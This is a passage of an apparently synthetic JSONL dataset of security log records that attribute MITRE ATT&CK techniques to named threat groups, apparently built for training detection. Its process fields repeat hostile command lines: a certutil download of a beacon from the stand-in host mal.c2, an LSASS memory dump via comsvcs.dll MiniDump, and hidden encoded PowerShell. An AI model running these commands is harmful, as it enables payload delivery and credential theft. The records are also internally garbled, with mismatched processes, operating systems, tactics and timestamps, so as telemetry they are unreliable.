beacon.dll","name":"wmic.exe","parent_name":"winlogon.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-11-02T00:46:39.000Z","user":{"name":"arn:aws:iam::mzir1j2cyfiz","sid":"S-1-5-21-261805112-736630750-2437"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1566.001 using LOLBin technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Initial Access","Defense Evasion","Command and Control"],"technique_id":"T1566.001"},"event_id":"evt_apt41_20251029T214217000Z_0017249","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["WMI","LOLBin","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.241.63.241","name":"APP-WEB-UFHX4AMPJT","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17249APT41T1566.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.133.38.180","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"wmic.exe","parent_name":"winlogon.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-10-12T01:08:41.000Z","user":{"name":"azuread\\bajdhczgwlfq","sid":"S-1-5-21-653285917-324827181-4228"}}
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1484.001 using encrypted C2 technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Defense Evasion"],"technique_id":"T1484.001"},"event_id":"evt_volttyphoon_20250711T141728000Z_0017251","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["Base64","Fileless","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.158.173.229","name":"DB-ORACLE-R9DZ51SSBW","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17251Volt TyphoonT1484.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.62.243.235","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1351 C:\\temp\\lsass.dmp full","name":"wmic.exe","parent_name":"explorer.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-06-19T15:04:54.000Z","user":{"name":"arn:aws:iam::poch9le0d4y4","sid":"S-1-5-21-221996592-355074742-8374"}}
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1566.001 using encrypted C2 technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Persistence","Lateral Movement"],"technique_id":"T1566.001"},"event_id":"evt_volttyphoon_20251001T142724000Z_0017253","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["Fileless","TLS","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.201.61.109","name":"WIN-FIN-SRV-GPXAJFPASC","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17253Volt TyphoonT1566.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.181.67.166","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"mshta.exe","parent_name":"winlogon.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-08-04T20:13:22.000Z","user":{"name":"azuread\\55htzwrgidi1","sid":"S-1-5-21-900413338-729759661-3163"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1071.001 using encrypted C2 technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Exfiltration","Privilege Escalation","Defense Evasion"],"technique_id":"T1071.001"},"event_id":"evt_unc4841_20260410T180323000Z_0017255","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["WMI","LOLBin","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.39.186.163","name":"IAM-ROLE-WVPXSXG7TG","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17255UNC4841T1071.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.12.25.17","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"wmic.exe","parent_name":"explorer.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-11-24T07:33:33.000Z","user":{"name":"arn:aws:iam::17lbmgja7k7b","sid":"S-1-5-21-716932258-608402886-1026"}}
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1098.004 using fileless technique.","sub_technique":"SSH Authorized Keys","tactic":["Privilege Escalation","Discovery","Lateral Movement"],"technique_id":"T1098.004"},"event_id":"evt_lapsus_20250608T160959000Z_0017257","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["LOLBin","WMI","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.36.57.116","name":"AZURE-VM-V2ICHXFMNW","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17257Lapsus$T1098.004"},"network":{"domain":"aws.amazon.com","dst_ip":"1.188.165.212","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 916 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"svchost.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-08-28T08:05:25.000Z","user":{"name":"i-ok9a8emocewh","sid":"S-1-5-21-390609700-345702610-6453"}}
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1071.001 using encrypted C2 technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Defense Evasion","Collection","Privilege Escalation"],"technique_id":"T1071.001"},"event_id":"evt_volttyphoon_20250209T102834000Z_0017259","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["WMI","LOLBin","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.43.60.223","name":"WIN-FIN-SRV-A9AMKOEGUV","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17259Volt TyphoonT1071.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.160.2.36","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1823 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"services.exe"},"source":"Windows Security Log","timestamp":"2025-10-07T03:13:07.000Z","user":{"name":"azuread\\6x1jzi8nzoms","sid":"S-1-5-21-654833939-443914367-5577"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1570 using encrypted C2 technique.","sub_technique":"Lateral Tool Transfer","tactic":["Command and Control","Exfiltration"],"technique_id":"T1570"},"event_id":"evt_mustangpanda_20261203T102424000Z_0017261","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["WMI","LOLBin","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.94.5.195","name":"DB-ORACLE-KVL3YA0JZ8","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17261Mustang PandaT1570"},"network":{"domain":"github.com","dst_ip":"1.130.144.217","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"powershell.exe","parent_name":"winlogon.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-04-09T23:32:36.000Z","user":{"name":"arn:aws:iam::rgesp3t9j6y1","sid":"S-1-5-21-598187620-402830218-2609"}}
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1566.001 using encrypted C2 technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Persistence","Initial Access","Impact"],"technique_id":"T1566.001"},"event_id":"evt_lapsus_20250224T012336000Z_0017263","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["TLS","LOLBin","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.155.18.155","name":"APP-WEB-ZQETYI6FLX","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17263Lapsus$T1566.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.2.212.151","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"winlogon.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-10-11T03:57:41.000Z","user":{"name":"CORP\\z7d0vdcpze1z","sid":"S-1-5-21-303088753-223506837-2022"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1566.001 using encrypted C2 technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Initial Access"],"technique_id":"T1566.001"},"event_id":"evt_unc4841_20250516T073212000Z_0017265","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["TLS","WMI","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.7.71.45","name":"AZURE-VM-JKBPJYA5VQ","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17265UNC4841T1566.001"},"network":{"domain":"github.com","dst_ip":"1.105.147.163","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"winlogon.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-10-16T23:14:47.000Z","user":{"name":"i-bd8q1gztlgrt","sid":"S-1-5-21-232798608-740052196-7278"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1546.003 using cloud-native technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Execution"],"technique_id":"T1546.003"},"event_id":"evt_unc4841_20260513T212859000Z_0017267","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["LOLBin","JA3 Spoof","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.95.186.116","name":"DB-ORACLE-CTNN8Q797V","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17267UNC4841T1546.003"},"network":{"domain":"update.microsoft.com","dst_ip":"1.130.195.173","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1344 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"winlogon.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-09-19T16:05:43.000Z","user":{"name":"svc_86lujussxw45","sid":"S-1-5-21-852098232-519110280-7545"}}
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1059.001 using fileless technique.","sub_technique":"PowerShell","tactic":["Execution","Reconnaissance"],"technique_id":"T1059.001"},"event_id":"evt_fin7_20250313T001753000Z_0017269","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["Base64","JA3 Spoof","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.159.86.26","name":"DB-ORACLE-27XEKBA4B0","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17269FIN7T1059.001"},"network":{"domain":"github.com","dst_ip":"1.147.96.57","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1676 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-06-24T02:16:42.000Z","user":{"name":"azuread\\bljs9i19y0c9","sid":"S-1-5-21-222469418-437329307-8179"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1059.001 using encrypted C2 technique.","sub_technique":"PowerShell","tactic":["Reconnaissance"],"technique_id":"T1059.001"},"event_id":"evt_unc4841_20260706T033632000Z_0017271","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["TLS","JA3 Spoof","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.214.104.151","name":"APP-WEB-GSTG8SIXEZ","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17271UNC4841T1059.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.75.66.158","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"explorer.exe"},"source":"Windows Security Log","timestamp":"2025-07-19T20:03:51.000Z","user":{"name":"i-q7ej4re75lq3","sid":"S-1-5-21-136764081-172543103-8858"}}
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1003.001 using LOLBin technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Command and Control","Credential Access","Initial Access"],"technique_id":"T1003.001"},"event_id":"evt_volttyphoon_20250803T162726000Z_0017273","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["WMI","Base64","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.28.38.48","name":"EC2-INST-BXO7Q9QAIW","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17273Volt TyphoonT1003.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.167.107.134","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3696 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"explorer.exe"},"source":"Windows Security Log","timestamp":"2026-10-06T05:20:15.000Z","user":{"name":"svc_ibnlclr9us8q","sid":"S-1-5-21-972108082-702459905-9396"}}
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1059.001 using LOLBin technique.","sub_technique":"PowerShell","tactic":["Command and Control","Lateral Movement"],"technique_id":"T1059.001"},"event_id":"evt_volttyphoon_20251024T222255000Z_0017275","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["Base64","JA3 Spoof","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.173.30.187","name":"IAM-ROLE-87FWEB7N5Q","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17275Volt TyphoonT1059.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.40.140.176","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"wmic.exe","parent_name":"explorer.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-10-13T02:09:33.000Z","user":{"name":"i-2tx0wmig9gtl","sid":"S-1-5-21-332438398-716152243-9426"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1531 using fileless technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Privilege Escalation","Exfiltration","Lateral Movement"],"technique_id":"T1531"},"event_id":"evt_apt29_20250724T062448000Z_0017277","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["TLS","Fileless","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.25.153.218","name":"WIN-FIN-SRV-GIUBA0XB0A","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17277APT29T1531"},"network":{"domain":"cdn-content.com","dst_ip":"1.51.112.196","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"cmstp.exe","parent_name":"svchost.exe"},"source":"Windows Security Log","timestamp":"2026-05-10T11:40:45.000Z","user":{"name":"azuread\\w2jdhur3lj9n","sid":"S-1-5-21-528691621-140462851-6405"}}
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1021.006 using encrypted C2 technique.","sub_technique":"Windows Remote Management","tactic":["Exfiltration"],"technique_id":"T1021.006"},"event_id":"evt_fin7_20260123T021733000Z_0017279","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["TLS","JA3 Spoof","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.103.209.58","name":"EC2-INST-SCPAYWJZW8","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17279FIN7T1021.006"},"network":{"domain":"update.microsoft.com","dst_ip":"1.15.23.77","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 612 C:\\temp\\lsass.dmp full","name":"certutil.exe","parent_name":"explorer.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-01-12T23:10:40.000Z","user":{"name":"CORP\\8msxxcgkefsg","sid":"S-1-5-21-595422871-262442842-5082"}}
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1531 using LOLBin technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Impact","Reconnaissance","Collection"],"technique_id":"T1531"},"event_id":"evt_fin7_20250815T025631000Z_0017281","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["Base64","WMI","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.162.58.115","name":"EC2-INST-J9WPQ4948U","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17281FIN7T1531"},"network":{"domain":"update.microsoft.com","dst_ip":"1.35.8.218","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"wmic.exe","parent_name":"services.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-10-31T02:59:15.000Z","user":{"name":"arn:aws:iam::ostltbzk3n91","sid":"S-1-5-21-533559826-501569674-1452"}}
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1566.001 using LOLBin technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Command and Control"],"technique_id":"T1566.001"},"event_id":"evt_scatteredspider_20250327T160055000Z_0017283","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["Fileless","TLS","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.90.193.149","name":"APP-WEB-7SRO7RSQA7","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17283Scattered SpiderT1566.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.90.174.107","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"services.exe"},"source":"Windows Security Log","timestamp":"2026-05-25T13:41:06.000Z","user":{"name":"azuread\\uaoeazv017ba","sid":"S-1-5-21-399026158-758380752-8313"}}
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1021.006 using cloud-native technique.","sub_technique":"Windows Remote Management","tactic":["Exfiltration"],"technique_id":"T1021.006"},"event_id":"evt_fin7_20260312T062420000Z_0017285","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["TLS","Fileless","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.48.77.182","name":"WIN-FIN-SRV-VWKL0NCBRC","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17285FIN7T1021.006"},"network":{"domain":"cdn-content.com","dst_ip":"1.38.233.8","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"explorer.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-07-22T18:12:47.000Z","user":{"name":"svc_n2uhounsmlln","sid":"S-1-5-21-326162201-198383288-2777"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1546.003 using LOLBin technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Lateral Movement"],"technique_id":"T1546.003"},"event_id":"evt_mustangpanda_20260803T032300000Z_0017287","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["TLS","LOLBin","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.60.11.230","name":"EC2-INST-7785N3MEVM","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17287Mustang PandaT1546.003"},"network":{"domain":"aws.amazon.com","dst_ip":"1.22.237.67","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"powershell.exe","parent_name":"services.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-09-27T09:14:13.000Z","user":{"name":"arn:aws:iam::61zm4wu6h9ij","sid":"S-1-5-21-405873068-359204945-1124"}}
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1546.003 using encrypted C2 technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Reconnaissance","Command and Control","Privilege Escalation"],"technique_id":"T1546.003"},"event_id":"evt_volttyphoon_20260827T062551000Z_0017289","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["Base64","TLS","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.255.85.107","name":"DB-ORACLE-0G7JJLQRBF","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17289Volt TyphoonT1546.003"},"network":{"domain":"aws.amazon.com","dst_ip":"1.22.235.171","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"mshta.exe","parent_name":"explorer.exe"},"source":"Windows Security Log","timestamp":"2025-08-09T03:08:26.000Z","user":{"name":"arn:aws:iam::445t8ei9izb6","sid":"S-1-5-21-251212482-718832733-4027"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1098.004 using cloud-native technique.","sub_technique":"SSH Authorized Keys","tactic":["Initial Access","Impact","Credential Access"],"technique_id":"T1098.004"},"event_id":"evt_mustangpanda_20260504T010858000Z_0017291","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["Fileless","Base64","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.71.100.26","name":"APP-WEB-Z57WO2WOB3","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17291Mustang PandaT1098.004"},"network":{"domain":"cdn-content.com","dst_ip":"1.37.77.39","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 893 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"winlogon.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-04-14T20:48:13.000Z","user":{"name":"arn:aws:iam::mvi1d56qzsjz","sid":"S-1-5-21-999094172-869891848-3530"}}
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1059.001 using fileless technique.","sub_technique":"PowerShell","tactic":["Privilege Escalation"],"technique_id":"T1059.001"},"event_id":"evt_lapsus_20261105T143318000Z_0017293","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["TLS","Base64","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.67.158.97","name":"DB-ORACLE-43JDUGLFCB","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17293Lapsus$T1059.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.165.143.142","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 640 C:\\temp\\lsass.dmp full","name":"wmic.exe","parent_name":"svchost.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-07-03T16:39:03.000Z","user":{"name":"CORP\\hfgj2gw9943r","sid":"S-1-5-21-166147921-890751828-5902"}}
